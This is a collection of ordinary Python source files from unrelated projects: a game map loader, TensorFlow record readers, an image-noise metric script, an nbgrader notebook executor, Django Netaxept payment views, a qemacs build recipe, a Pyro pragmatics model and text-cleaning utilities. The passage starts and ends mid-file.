for idx, player in enumerate(players):
if idx < len(old_players):
player.weapon = old_players[idx].weapon
player.life = old_players[idx].life
# Creating items
for map_object in map.layernames['items']:
# Creating the object
item_classes = list()
if map_object.class_life_small == 'true': item_classes.append(LifePotionSmall)
if map_object.class_axe == 'true': item_classes.append(Axe)
if map_object.class_bow == 'true': item_classes.append(Bow)
if map_object.class_knife == 'true': item_classes.append(Knife)
if map_object.class_sword == 'true': item_classes.append(Sword)
if len(item_classes)>0: random.choice(item_classes)((map_object.x - 35, map_object.y - 25))
# Creating portals
if 'portals' in map.layernames:
for map_object in map.layernames['portals']:
p = Portal((map_object.x - 35, map_object.y - 25))
p.to_map = map_object.to_map
# Global objects
keys_pressed = {}
# The game mechanics is updating.
active = False
# The game graphics are visible.
visible = True
# Map related objects
map = map_rect = renderer = render_group = animated_objects = collisionable_sprites = hitboxes = touchable_objects = \
collisionable_walls = grid_collisionable_walls = players = last_map_loaded = None
|
the-stack_106_23885 | """Import data from tensorflow format."""
# Copyright 2019 CSIRO (Data61)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from glob import glob
from typing import Callable, Dict, Iterator, List, NamedTuple, Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from landshark.metadata import FeatureSet, Target, Training
from landshark.serialise import deserialise
from landshark.util import points_per_batch
log = logging.getLogger(__name__)
def dataset_fn(
records: List[str],
batchsize: int,
features: FeatureSet,
targets: Optional[Target] = None,
epochs: int = 1,
take: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> Callable[[], tf.data.TFRecordDataset]:
"""Dataset feeder."""
def f() -> tf.data.TFRecordDataset:
dataset = tf.data.TFRecordDataset(records, compression_type="ZLIB").repeat(
count=epochs
)
if shuffle:
dataset = dataset.shuffle(buffer_size=shuffle_buffer, seed=random_seed)
dataset = (
dataset.take(take)
.batch(batchsize)
.map(lambda x: deserialise(x, features, targets))
)
return dataset
return f
def get_training_meta(directory: str) -> Tuple[Training, List[str], List[str]]:
"""Read train/test metadata and record filenames from dir."""
test_dir = os.path.join(directory, "testing")
training_records = glob(os.path.join(directory, "*.tfrecord"))
testing_records = glob(os.path.join(test_dir, "*.tfrecord"))
metadata = Training.load(directory)
return metadata, training_records, testing_records
def get_query_meta(query_dir: str) -> Tuple[FeatureSet, List[str], int, int]:
"""Read query metadata and record filenames from dir."""
strip_list = query_dir.rstrip("/").split("strip")[-1].split("of")
assert len(strip_list) == 2
strip = int(strip_list[0])
nstrip = int(strip_list[1])
query_metadata = FeatureSet.load(query_dir)
query_records = glob(os.path.join(query_dir, "*.tfrecord"))
query_records.sort()
return query_metadata, query_records, strip, nstrip
def _make_mask(
x: Dict[str, np.ndarray], xm: Dict[str, np.ndarray]
) -> Dict[str, np.ma.MaskedArray]:
"""Combine arrays and masks to MaskedArray's."""
assert x.keys() == xm.keys()
d = {k: np.ma.MaskedArray(data=x[k], mask=xm[k]) for k in x.keys()}
return d
TData = Dict[str, Union[np.ndarray, Dict[str, np.ndarray]]]
class XData(NamedTuple):
"""Container for covariate data X."""
x_con: Optional[Dict[str, np.ma.MaskedArray]]
x_cat: Optional[Dict[str, np.ma.MaskedArray]]
indices: np.ndarray
coords: np.ndarray
class XYData(NamedTuple):
"""Container for covariate X and target data Y."""
x_con: Optional[Dict[str, np.ma.MaskedArray]]
x_cat: Optional[Dict[str, np.ma.MaskedArray]]
indices: np.ndarray
coords: np.ndarray
y: Dict[str, np.ndarray]
def _split(X: TData) -> XData:
"""Split dict into elements."""
Xcon = _make_mask(X["con"], X["con_mask"]) if "con" in X else None
Xcat = _make_mask(X["cat"], X["cat_mask"]) if "cat" in X else None
return XData(Xcon, Xcat, X["indices"], X["coords"])
def _concat_dict(xlist: List[TData]) -> TData:
"""Join dicts of arrays together."""
out_dict = {}
for k, v in xlist[0].items():
if tf.is_tensor(v):
out_dict[k] = np.concatenate([di[k] for di in xlist], axis=0)
else:
out_dict[k] = _concat_dict([di[k] for di in xlist])
return out_dict
def extract_split_xy(dataset: tf.data.TFRecordDataset) -> XYData:
"""Extract (X, Y) data from tensor dataset and split."""
x_list, y_list = zip(*dataset)
Y = np.concatenate(y_list, axis=0)
X = _concat_dict(x_list)
x_con, x_cat, indices, coords = _split(X)
return XYData(x_con, x_cat, indices, coords, Y)
def xy_record_data(
records: List[str],
metadata: Training,
batchsize: int = 1000,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> XYData:
"""Read train/test record."""
train_dataset = dataset_fn(
records=records,
batchsize=batchsize,
features=metadata.features,
targets=metadata.targets,
take=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)()
xy_data_tuple = extract_split_xy(train_dataset)
return xy_data_tuple
def query_data_it(
records: List[str],
features: FeatureSet,
batchsize: int,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> Iterator[XData]:
"""Exctract query data from tfrecord in batches."""
dataset = dataset_fn(
records=records,
batchsize=batchsize,
features=features,
take=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)()
for X in dataset:
yield _split(X)
#
# functions for inspecting tfrecord data directly
#
def read_train_record(
directory: str,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> XYData:
"""Read train record."""
metadata, train_records, _ = get_training_meta(directory)
train_data_tuple = xy_record_data(
records=train_records,
metadata=metadata,
npoints=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)
return train_data_tuple
def read_test_record(
directory: str,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> XYData:
"""Read test record."""
metadata, _, test_records = get_training_meta(directory)
test_data_tuple = xy_record_data(
records=test_records,
metadata=metadata,
npoints=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)
return test_data_tuple
def read_query_record(
query_dir: str,
batch_mb: float,
npoints: int = -1,
shuffle: bool = False,
shuffle_buffer: int = 1000,
random_seed: Optional[int] = None,
) -> Iterator[XData]:
"""Read query data in batches."""
features, records, strip, nstrip = get_query_meta(query_dir)
batchsize = points_per_batch(features, batch_mb)
yield from query_data_it(
records=records,
features=features,
batchsize=batchsize,
npoints=npoints,
shuffle=shuffle,
shuffle_buffer=shuffle_buffer,
random_seed=random_seed,
)
|
the-stack_106_23887 | # Copyright 2019 Julian Niedermeier & Goncalo Mordido
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import time
import matplotlib.pyplot as plt
import numba
import numpy as np
import scipy.sparse
import seaborn as sns
from skimage.util.dtype import img_as_float64
from sklearn.metrics import pairwise_distances
from misc import images, util
from metrics.fuzzy_topology_impact import fuzzy_topology_impact
sns.set(context="paper", style="white")
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=util.HelpFormatter)
parser.add_argument(
"-train",
type=str,
default=None,
required=True,
help="Path to a .npy file with train dataset.",
)
parser.add_argument(
"-test",
type=str,
default=None,
required=True,
help="Path to a .npy file with test dataset.",
)
parser.add_argument(
"-savefile",
type=str,
default=None,
required=True,
help="Name of the output file.",
)
# UMAP
parser.add_argument(
"-k", type=int, default=20, help="n_neighbor parameter for UMAP."
)
parser.add_argument(
"-metric", type=str, default="euclidean", help="metric parameter for UMAP."
)
parser.add_argument(
"-local_connectivity",
type=float,
default=0.0,
help="local_connectivity parameter for UMAP.",
)
# Noise
parser.add_argument(
"-noise_target",
type=str,
choices=["train", "test"],
default=None,
help="To which data the noise is applied.",
)
parser.add_argument(
"-noise",
type=str,
choices=["blur", "gaussian", "sap", "swirl"],
default=None,
help="Type of noise to apply to test images. 'sap' is Salt & Pepper.",
)
parser.add_argument(
"-image_shape",
type=str,
default=None,
help="Required if noise is set. Specifies width,height,channel.",
)
parser.add_argument(
"-noise_amount",
type=float,
default=None,
help="Standard deviation for blur, variance for noise, proportion of pixels "
"for s&p, strength for swirl.",
)
parser.add_argument(
"-noise_radius", type=float, default=None, help="Radius of swirl."
)
# Misc
parser.add_argument(
"-cache",
type=str,
default=None,
help="Cache directory for train distance matrix. Does not cache, if not specified.",
)
parser.add_argument(
"-save_images",
action="store_true",
help="If set, will save test and train image originals and noised versions.",
)
parser.add_argument(
"-no_timestamp",
action="store_true",
help="If set, disables adding '.time[timestamp]' to -savefile",
)
parser.add_argument(
"-dont_use_noise_args",
action="store_true",
help="If set, will not use all the noise arguments to add noise to the input data but will save the argument values in the .npz archive.",
)
# Labels
parser.add_argument(
"-train_labels",
type=str,
default=None,
help="Path to a .npy file with labels for -train.",
)
parser.add_argument(
"-allowed_train_labels",
nargs="+",
type=int,
default=None,
help="List of label IDs to pick from -train_labels. Data in -train_labels "
"not matching these labels will be discarded.",
)
parser.add_argument(
"-test_labels",
type=str,
default=None,
help="Path to a .npy file with labels for -test.",
)
parser.add_argument(
"-allowed_test_labels",
nargs="+",
type=int,
default=None,
help="List of label IDs to pick from -test_labels. Data in -test_labels "
"not matching these labels will be discarded.",
)
parser.add_argument(
"-sample_train",
type=int,
default=None,
help="If set, will randomly pick that many samples from the train set.",
)
parser.add_argument(
"-sample_test",
type=int,
default=None,
help="If set, will randomly pick that many samples from the test set.",
)
parser.add_argument("-seed", type=int, default=None, help="A seed for numpy.")
args = parser.parse_args()
np.random.seed(args.seed)
os.makedirs(os.path.dirname(args.savefile), exist_ok=True)
print("Loading Data")
print("- train:", args.train)
print("- test:", args.test)
train = np.load(args.train)
test = np.load(args.test)
if args.sample_train:
train = train[
np.random.choice(train.shape[0], args.sample_train, replace=False)
]
if args.sample_test:
test = test[np.random.choice(test.shape[0], args.sample_test, replace=False)]
original_train_dtype = train.dtype
original_test_dtype = test.dtype
assert train.dtype == test.dtype
assert train.shape[1:] == test.shape[1:]
if np.ndim(train) > 2:
train = np.reshape(train, (train.shape[0], -1))
if np.ndim(test) > 2:
test = np.reshape(test, (test.shape[0], -1))
if not args.no_timestamp:
args.savefile = f"{args.savefile}.time[{time.time()}]"
print("Save Path:", args.savefile)
if args.train_labels:
if args.allowed_train_labels is None:
parser.error(
"When -train_labels is set you have to also specify -allowed_train_labels"
)
if args.cache:
print(
"WARNING: Using -cache and -train_labels might have unexpected effects!"
)
train_labels = np.load(args.train_labels).astype(np.int64)
unique_train_labels = np.unique(train_labels)
if train_labels.shape[0] != train.shape[0]:
raise ValueError("Shape[0] of -train_labels and -train do not match")
allowed_train_labels = np.unique(args.allowed_train_labels)
if not np.isin(allowed_train_labels, unique_train_labels).all():
raise ValueError("Not all -allowed_train_labels are in -train_labels")
train_label_indices = np.where(np.isin(train_labels, allowed_train_labels))
original_train_shape = train.shape
train = train[train_label_indices]
print(f"Selected {train.shape[0]} elements from -train")
if args.test_labels:
if args.allowed_test_labels is None:
parser.error(
"When -test_labels is set you have to also specify -allowed_test_labels"
)
test_labels = np.load(args.test_labels).astype(np.int64)
unique_test_labels = np.unique(test_labels)
if test_labels.shape[0] != test.shape[0]:
raise ValueError("Shape[0] of -test_labels and -test do not match")
allowed_test_labels = np.unique(args.allowed_test_labels)
if not np.isin(allowed_test_labels, unique_test_labels).all():
raise ValueError("Not all -allowed_test_labels are in -test_labels")
test_label_indices = np.where(np.isin(test_labels, allowed_test_labels))
original_test_shape = test.shape
test = test[test_label_indices]
print(f"Selected {test.shape[0]} elements from -test")
if args.noise:
if args.noise_amount is None:
parser.error("When -noise is set you have to also set -noise_amount")
if args.noise == "swirl" and args.noise_radius is None:
parser.error("When -noise=swirl you have to also set -noise_radius.")
if args.noise and not args.dont_use_noise_args:
if args.noise_target == "train":
target = train
other_target = "test"
other = test
else:
target = test
other_target = "train"
other = train
if not (other.min() >= -1.0 and other.max() <= 1.0):
if other.dtype == np.uint8:
other = img_as_float64(other)
else:
other /= 255.0
if not (other.min() >= -1.0 and other.max() <= 1.0):
raise ValueError(
f"{other_target} data cannot be normalized to range [-1, 1]"
)
if args.image_shape is None:
parser.error("When -noise is set you have to also set -image_shape.")
w, h, c = [int(n) for n in args.image_shape.split(",")]
print(f"Distorting {args.noise_target} Images")
distorted_images = np.empty(target.shape, dtype=np.float64)
image_shape = (w, h) if c == 1 else (w, h, c)
cmap = None if c > 1 else "gray"
for i, image in enumerate(target):
image = image.reshape(image_shape)
if i == 0:
if args.save_images:
plt.imshow(image, cmap=cmap)
plt.savefig(f"{args.savefile}.{args.noise_target}_original.png")
plt.imshow(other[0].reshape(image_shape), cmap=cmap)
plt.savefig(f"{args.savefile}.{other_target}_original.png")
if args.noise == "blur":
image = images.apply_gaussian_blur(image, args.noise_amount)
elif args.noise == "gaussian":
image = images.apply_gaussian_noise(image, args.noise_amount)
elif args.noise == "sap":
image = images.apply_salt_and_pepper(image, args.noise_amount)
else:
image = images.apply_swirl(image, args.noise_amount, args.noise_radius)
if i == 0 and args.save_images:
plt.imshow(image, cmap=cmap)
plt.savefig(f"{args.savefile}.{args.noise_target}.png")
distorted_images[i] = image.reshape(-1)
if args.noise_target == "train":
train = distorted_images
test = other
else:
test = distorted_images
train = other
elif (
(train.min() >= 0 and train.max() <= 255)
and (test.min() >= 0 and test.max() <= 255)
and train.dtype == np.uint8
):
print("Data could be uint8 images. Converting to float64 in range [0,1]")
train = img_as_float64(train)
test = img_as_float64(test)
elif train.dtype == np.float32 or test.dtype == np.float32:
print("Detected train or test float32. Casting both to float64")
train = train.astype(np.float64)
test = test.astype(np.float64)
print("Data Statistics:")
print("----------------")
print("Train")
if args.train_labels:
print("- Original Shape:", original_train_shape)
print("- Shape:", train.shape)
if original_train_dtype != train.dtype:
print("- Original Dtype:", original_train_dtype)
if args.allowed_train_labels is not None:
print("- Allowed Labels:", args.allowed_train_labels)
print("- Dtype:", train.dtype)
print("- Min:", train.min())
print("- Max:", train.max())
print("- Noise:", "True" if args.noise_target == "train" else "False")
print("- Labels:", "True" if args.train_labels else "False")
print("Test")
if args.test_labels:
print("- Original Shape:", original_test_shape)
print("- Shape:", test.shape)
if original_test_dtype != test.dtype:
print("- Original Dtype:", original_test_dtype)
if args.allowed_test_labels is not None:
print("- Allowed Labels:", args.allowed_test_labels)
print("- Dtype:", test.dtype)
print("- Min:", test.min())
print("- Max:", test.max())
print("- Noise:", "True" if args.noise_target == "test" else "False")
print("- Labels:", "True" if args.test_labels else "False")
if args.cache:
train_dmat_cache_file = os.path.join(
args.cache, f"{os.path.basename(args.train)}.train_dmat.npy"
)
print("Cache:", train_dmat_cache_file)
os.makedirs(args.cache, exist_ok=True)
if not os.path.exists(train_dmat_cache_file):
print("Computing TRAIN dmat")
train_dmat = pairwise_distances(train, metric=args.metric)
np.save(train_dmat_cache_file, train_dmat)
else:
print("Loading TRAIN dmat")
train_dmat = np.load(train_dmat_cache_file)
else:
train_dmat = None
print("Computing Fuzzy Topology Impact")
s = time.time()
impact, P_X, P_X_Xprime_minus_xprime, fs_set_X_size = fuzzy_topology_impact(
train, test, args.k, args.metric, args.local_connectivity, train_dmat
)
e = time.time()
print(f"Computed impact {impact} for {test.shape[0]} samples in {e-s} seconds")
additional_save_data = {
"k": args.k,
"metric": args.metric,
"local_connectivity": args.local_connectivity,
}
if args.allowed_train_labels:
additional_save_data["original_train_labels"] = unique_train_labels
additional_save_data["allowed_train_labels"] = allowed_train_labels
if args.allowed_test_labels:
additional_save_data["original_test_labels"] = unique_test_labels
additional_save_data["allowed_test_labels"] = allowed_test_labels
if args.noise_target:
additional_save_data[f"{args.noise_target}_noise"] = args.noise
additional_save_data[f"{args.noise_target}_noise_amount"] = args.noise_amount
if args.noise == "swirl":
additional_save_data[
f"{args.noise_target}_noise_radius"
] = args.noise_radius
if args.sample_train:
additional_save_data["sample_train"] = args.sample_train
if args.sample_test:
additional_save_data["sample_test"] = args.sample_test
np.savez_compressed(
args.savefile,
impact=impact,
P_X=P_X,
P_X_Xprime_minus_xprime=P_X_Xprime_minus_xprime,
fs_set_X_size=fs_set_X_size,
**additional_save_data,
)
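    # A minimal sketch of inspecting the saved archive afterwards (the
    # "results.npz" filename stands in for whatever was passed as the save file):
    #
    #   data = np.load("results.npz", allow_pickle=True)
    #   print(data["impact"], data["k"], data["metric"])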
|
the-stack_106_23888 | from nbconvert.preprocessors import ExecutePreprocessor, CellExecutionError
from traitlets import Bool, List, Integer
from textwrap import dedent
from . import NbGraderPreprocessor
from nbconvert.exporters.exporter import ResourcesDict
from nbformat.notebooknode import NotebookNode
from typing import Any, Optional, Tuple
class UnresponsiveKernelError(Exception):
pass
class Execute(NbGraderPreprocessor, ExecutePreprocessor):
interrupt_on_timeout = Bool(True)
allow_errors = Bool(True)
raise_on_iopub_timeout = Bool(True)
extra_arguments = List([], help=dedent(
"""
A list of extra arguments to pass to the kernel. For python kernels,
this defaults to ``--HistoryManager.hist_file=:memory:``. For other
kernels this is just an empty list.
""")
).tag(config=True)
execute_retries = Integer(0, help=dedent(
"""
The number of times to try re-executing the notebook before throwing
an error. Generally, this shouldn't need to be set, but might be useful
for CI environments when tests are flaky.
""")
).tag(config=True)
def preprocess(self,
nb: NotebookNode,
resources: ResourcesDict,
retries: Optional[Any] = None
) -> Tuple[NotebookNode, ResourcesDict]:
# This gets added in by the parent execute preprocessor, so if it's already in our
# extra arguments we need to delete it or traitlets will be unhappy.
if '--HistoryManager.hist_file=:memory:' in self.extra_arguments:
self.extra_arguments.remove('--HistoryManager.hist_file=:memory:')
if retries is None:
retries = self.execute_retries
try:
output = super(Execute, self).preprocess(nb, resources)
except RuntimeError:
if retries == 0:
raise UnresponsiveKernelError()
else:
self.log.warning("Failed to execute notebook, trying again...")
return self.preprocess(nb, resources, retries=retries - 1)
return output
def preprocess_cell(self, cell, resources, cell_index, store_history=True):
"""
Need to override preprocess_cell to check reply for errors
"""
# Copied from nbconvert ExecutePreprocessor
if cell.cell_type != 'code' or not cell.source.strip():
return cell, resources
reply, outputs = self.run_cell(cell, cell_index, store_history)
# Backwards compatibility for processes that wrap run_cell
cell.outputs = outputs
cell_allows_errors = (self.allow_errors or "raises-exception"
in cell.metadata.get("tags", []))
if self.force_raise_errors or not cell_allows_errors:
if (reply is not None) and reply['content']['status'] == 'error':
raise CellExecutionError.from_cell_and_msg(cell, reply['content'])
# Ensure errors are recorded to prevent false positives when autograding
if (reply is None) or reply['content']['status'] == 'error':
error_recorded = False
for output in cell.outputs:
if output.output_type == 'error':
error_recorded = True
if not error_recorded:
error_output = NotebookNode(output_type='error')
if reply is None:
# Occurs when
# IPython.core.interactiveshell.InteractiveShell.showtraceback
# = None
error_output.ename = "CellTimeoutError"
error_output.evalue = ""
error_output.traceback = ["ERROR: No reply from kernel"]
else:
# Occurs when
# IPython.core.interactiveshell.InteractiveShell.showtraceback
# = lambda *args, **kwargs : None
error_output.ename = reply['content']['ename']
error_output.evalue = reply['content']['evalue']
error_output.traceback = reply['content']['traceback']
if error_output.traceback == []:
error_output.traceback = ["ERROR: An error occurred while"
" showtraceback was disabled"]
cell.outputs.append(error_output)
return cell, resources
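# A minimal usage sketch (assumes an nbformat NotebookNode `nb`; Execute follows
# the standard nbconvert preprocessor protocol, so it is driven via `preprocess`):
#
#   preprocessor = Execute(execute_retries=2)
#   nb, resources = preprocessor.preprocess(nb, ResourcesDict())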
|
the-stack_106_23889 | """
Example views for interactive testing of payment with netaxept.
"""
from django.http import HttpRequest
from django.http import HttpResponse
from django.shortcuts import redirect, get_object_or_404
from django.template.response import TemplateResponse
from django.urls import path
from django.views.decorators.http import require_GET
from structlog import get_logger
from payment import get_payment_gateway
from payment.gateways.netaxept import actions
from payment.gateways.netaxept import gateway_to_netaxept_config
from payment.gateways.netaxept import netaxept_protocol
from payment.models import Payment
from payment.utils import gateway_authorize
logger = get_logger()
@require_GET
def register_and_goto_terminal(request: HttpRequest, payment_id: int) -> HttpResponse:
"""
Register the payment with netaxept, and take the user to the terminal page for payment authorization.
"""
logger.info('netaxept-register-and-goto-terminal', payment_id=payment_id)
payment = get_object_or_404(Payment, id=payment_id)
transaction_id = actions.register_payment(payment)
payment_gateway, gateway_config = get_payment_gateway(payment.gateway)
netaxept_config = gateway_to_netaxept_config(gateway_config)
return redirect(netaxept_protocol.get_payment_terminal_url(config=netaxept_config, transaction_id=transaction_id))
@require_GET
def after_terminal(request):
"""
The browser gets redirected here when the user finishes interacting with the netaxept terminal pages.
We expect query-string parameters: transactionId and responseCode.
https://shop.nets.eu/web/partners/response-codes
    Note that it is very easy for a user to invoke this endpoint himself (by looking at the parameters of
    the netaxept terminal) in order to pretend that he paid.
This is why we verify the state of the payment by calling netaxept.
Assumptions: We expect the terminal to have been opened with AuthAuth set to True.
"""
transaction_id = request.GET['transactionId']
response_code = request.GET['responseCode']
logger.info('netaxept-after-terminal', transaction_id=transaction_id, response_code=response_code)
if response_code == 'Cancel':
return HttpResponse('Payment cancelled')
elif response_code == 'OK':
payment = Payment.objects.get(token=transaction_id)
try:
# This will verify if the payment was indeed authorized.
gateway_authorize(payment=payment, payment_token=payment.token)
except Exception as exc:
logger.error('netaxept-after-terminal-error', exc_info=exc)
return HttpResponse('Error authorizing {}: {}'.format(payment.id, exc))
else:
return redirect('view_payment', payment_id=payment.id)
else: # The error case
payment = Payment.objects.get(token=transaction_id)
try:
# This will query the state of the payment in netaxept, and create a transaction object with all details
gateway_authorize(payment=payment, payment_token=payment.token)
finally:
return HttpResponse('Payment error {}'.format(response_code))
def query(request: HttpRequest, transaction_id: str) -> HttpResponse:
"""
    Retrieves the status of the given transaction from netaxept.
"""
logger.info('netaxept-query', transaction_id=transaction_id)
payment_gateway, gateway_config = get_payment_gateway('netaxept')
netaxept_config = gateway_to_netaxept_config(gateway_config)
query_response = netaxept_protocol.query(config=netaxept_config, transaction_id=transaction_id)
return TemplateResponse(request, 'netaxept/query_result.html', {'query_response': query_response})
urls = [
path('register_and_goto_terminal/<payment_id>', register_and_goto_terminal,
name='netaxept_register_and_goto_terminal'),
path('after_terminal', after_terminal, name='netaxept_after_terminal'),
path('query/<transaction_id>', query, name='netaxept_query'),
]
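# A minimal sketch of mounting these example views in a project urlconf (the
# "payment/netaxept/" prefix is an assumption, not part of this module):
#
#   from django.urls import include, path
#   urlpatterns = [path('payment/netaxept/', include(urls))]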
|
the-stack_106_23890 | from .base import GnuRecipe
class QemacsRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(QemacsRecipe, self).__init__(*args, **kwargs)
self.sha256 = '2ffba66a44783849282199acfcc08707' \
'debc7169394a8fd0902626222f27df94'
self.name = 'qemacs'
self.version = '0.3.3'
self.version_regex = r'(?P<version>\d+\.\d+\.\d+)'
self.version_url = 'https://bellard.org/qemacs/'
self.url = 'https://bellard.org/qemacs/qemacs-$version.tar.gz'
self.configure_args += ['--disable-xv']
self.compile_args = ['make', '-j1']
|
the-stack_106_23891 | # Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
"""
Interpreting hyperbole with RSA models of pragmatics.
Taken from: https://gscontras.github.io/probLang/chapters/03-nonliteral.html
"""
import torch
import collections
import argparse
import pyro
import pyro.distributions as dist
import pyro.poutine as poutine
from search_inference import HashingMarginal, memoize, Search
torch.set_default_dtype(torch.float64) # double precision for numerical stability
def Marginal(fn):
return memoize(lambda *args: HashingMarginal(Search(fn).run(*args)))
######################################
# models
######################################
# hashable state
State = collections.namedtuple("State", ["price", "valence"])
def approx(x, b=None):
if b is None:
b = 10.
div = float(x)/b
rounded = int(div) + 1 if div - float(int(div)) >= 0.5 else int(div)
return int(b) * rounded
def price_prior():
values = [50, 51, 500, 501, 1000, 1001, 5000, 5001, 10000, 10001]
probs = torch.tensor([0.4205, 0.3865, 0.0533, 0.0538, 0.0223, 0.0211, 0.0112, 0.0111, 0.0083, 0.0120])
ix = pyro.sample("price", dist.Categorical(probs=probs))
return values[ix]
def valence_prior(price):
probs = {
50: 0.3173,
51: 0.3173,
500: 0.7920,
501: 0.7920,
1000: 0.8933,
1001: 0.8933,
5000: 0.9524,
5001: 0.9524,
10000: 0.9864,
10001: 0.9864
}
return pyro.sample("valence", dist.Bernoulli(probs=probs[price])).item() == 1
def meaning(utterance, price):
return utterance == price
qud_fns = {
"price": lambda state: State(price=state.price, valence=None),
"valence": lambda state: State(price=None, valence=state.valence),
"priceValence": lambda state: State(price=state.price, valence=state.valence),
"approxPrice": lambda state: State(price=approx(state.price), valence=None),
"approxPriceValence": lambda state: State(price=approx(state.price), valence=state.valence),
}
def qud_prior():
values = ["price", "valence", "priceValence", "approxPrice", "approxPriceValence"]
ix = pyro.sample("qud", dist.Categorical(probs=torch.ones(len(values)) / len(values)))
return values[ix]
def utterance_cost(numberUtt):
preciseNumberCost = 1.
return 0. if approx(numberUtt) == numberUtt else preciseNumberCost
def utterance_prior():
utterances = [50, 51, 500, 501, 1000, 1001, 5000, 5001, 10000, 10001]
utteranceLogits = -torch.tensor(list(map(utterance_cost, utterances)),
dtype=torch.float64)
ix = pyro.sample("utterance", dist.Categorical(logits=utteranceLogits))
return utterances[ix]
@Marginal
def literal_listener(utterance, qud):
price = price_prior()
state = State(price=price, valence=valence_prior(price))
pyro.factor("literal_meaning", 0. if meaning(utterance, price) else -999999.)
return qud_fns[qud](state)
@Marginal
def speaker(qudValue, qud):
alpha = 1.
utterance = utterance_prior()
literal_marginal = literal_listener(utterance, qud)
with poutine.scale(scale=torch.tensor(alpha)):
pyro.sample("listener", literal_marginal, obs=qudValue)
return utterance
@Marginal
def pragmatic_listener(utterance):
# priors
price = price_prior()
valence = valence_prior(price)
qud = qud_prior()
# model
state = State(price=price, valence=valence)
qudValue = qud_fns[qud](state)
speaker_marginal = speaker(qudValue, qud)
pyro.sample("speaker", speaker_marginal, obs=utterance)
return state
def test_truth():
true_vals = {
"probs": torch.tensor([0.0018655171404222354,0.1512643329444101,0.0030440475496016296,0.23182161303428897,0.00003854830096338984,0.01502495595927897,0.00003889558295405101,0.015160315922876075,0.00016425635615857924,0.026788637869123822,0.00017359794987375924,0.028312162297699582,0.0008164336950199063,0.060558944822420434,0.0008088460212743665,0.05999612935009309,0.01925106279557206,0.17429720083660782,0.02094455861717477,0.18962994295418778]), # noqa: E231,E501
"support": list(map(lambda d: State(**d), [{"price":10001,"valence":False},{"price":10001,"valence":True},{"price":10000,"valence":False},{"price":10000,"valence":True},{"price":5001,"valence":False},{"price":5001,"valence":True},{"price":5000,"valence":False},{"price":5000,"valence":True},{"price":1001,"valence":False},{"price":1001,"valence":True},{"price":1000,"valence":False},{"price":1000,"valence":True},{"price":501,"valence":False},{"price":501,"valence":True},{"price":500,"valence":False},{"price":500,"valence":True},{"price":51,"valence":False},{"price":51,"valence":True},{"price":50,"valence":False},{"price":50,"valence":True}])) # noqa: E231,E501
}
pragmatic_marginal = pragmatic_listener(10000)
for i, elt in enumerate(true_vals["support"]):
print("{}: true prob {} pyro prob {}".format(
elt, true_vals["probs"][i].item(),
pragmatic_marginal.log_prob(elt).exp().item()))
def main(args):
# test_truth()
pragmatic_marginal = pragmatic_listener(args.price)
pd, pv = pragmatic_marginal._dist_and_values()
print([(s, pragmatic_marginal.log_prob(s).exp().item())
for s in pragmatic_marginal.enumerate_support()])
if __name__ == "__main__":
assert pyro.__version__.startswith('1.5.1')
parser = argparse.ArgumentParser(description="parse args")
parser.add_argument('-n', '--num-samples', default=10, type=int)
parser.add_argument('--price', default=10000, type=int)
args = parser.parse_args()
main(args)
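# Example invocation from the command line (the module filename is an assumption):
#
#   python hyperbole.py --price 1000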
|
the-stack_106_23892 | import re
import os
import numpy as np
import itertools
import collections
from unidecode import unidecode
from malaya.text.tatabahasa import (
stopword_tatabahasa,
stopwords,
stopwords_calon,
laughing,
)
from malaya.text.rules import normalized_chars
from malaya.text.english.words import words as _english_words
from malaya.text.bahasa.words import words as _malay_words
from malaya import home
import json
STOPWORDS = set(stopwords + stopword_tatabahasa + stopwords_calon)
STOPWORD_CALON = set(stopwords_calon)
VOWELS = 'aeiou'
PHONES = ['sh', 'ch', 'ph', 'sz', 'cz', 'sch', 'rz', 'dz']
ENGLISH_WORDS = _english_words
MALAY_WORDS = _malay_words
def _isWord(word):
if word:
consecutiveVowels = 0
consecutiveConsonents = 0
for idx, letter in enumerate(word.lower()):
vowel = True if letter in VOWELS else False
if idx:
prev = word[idx - 1]
prevVowel = True if prev in VOWELS else False
if not vowel and letter == 'y' and not prevVowel:
vowel = True
if prevVowel != vowel:
consecutiveVowels = 0
consecutiveConsonents = 0
if vowel:
consecutiveVowels += 1
else:
consecutiveConsonents += 1
if consecutiveVowels >= 3 or consecutiveConsonents > 3:
return False
if consecutiveConsonents == 3:
subStr = word[idx - 2 : idx + 1]
if any(phone in subStr for phone in PHONES):
consecutiveConsonents -= 1
continue
return False
return True
def make_cleaning(s, c_dict):
s = s.translate(c_dict)
return s
def transformer_textcleaning(string):
"""
    used by any transformer model before tokenization
"""
string = unidecode(string)
string = ' '.join(
[make_cleaning(w, normalized_chars) for w in string.split()]
)
string = re.sub('\(dot\)', '.', string)
